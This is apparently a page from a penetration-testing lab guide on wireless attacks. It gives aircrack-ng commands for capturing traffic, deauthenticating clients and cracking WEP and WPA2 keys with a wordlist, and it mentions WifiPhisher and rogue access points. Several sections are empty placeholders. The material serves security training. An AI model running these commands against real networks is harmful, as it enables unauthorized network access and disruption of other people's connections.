# 3. Perform Wireless Attacks {% embed url="" %} ## 1. Crack WEP using Aircrack-ng ``` airmon-ng start wlan0 airodump-ng airodump-ng –w "filename" -c "channel name" aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface) aireplay-ng -3 –b "bssid" -h "mac address" aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 aircrack-ng -b "filename.cap" ``` ## 2. Crack WEP using WifiPhisher {% embed url="" %} ## 3. Crack WPA with FERN cracker ## 4. Crack WPA 2 with Aircrack WPA2 is an upgrade to WPA; it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption protocol with strong security. WPA2 has two modes of operation: WPA2-Personal and WPA2-Enterprise. Despite being stronger than both WEP and WPA, the WPA2 encryption method can also be cracked using various techniques and tools. In this task, we will use the Aircrack-ng suite to crack a WPA2 network. ``` aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap ``` * **-a** is the technique used to crack the handshake, **2**=WPA technique. * **-b** refers to bssid; replace with the BSSID of the target router. * **-w** stands for wordlist; provide the path to a wordlist.

The result appears, showing the WPA handshake packet captured with airodump-ng. The target access point’s password is cracked and displayed in plain text next to the message **KEY FOUND!**, as shown in the screenshot.

{% embed url="" %} Full tutorial {% endembed %} You can also use other tools such as **hashcat** (), **Portable Penetrator** (), **WepCrackGui** () to crack WEP/WPA/WPA2 encryption. ## 5. Create a Rogue access Point {% embed url="" %}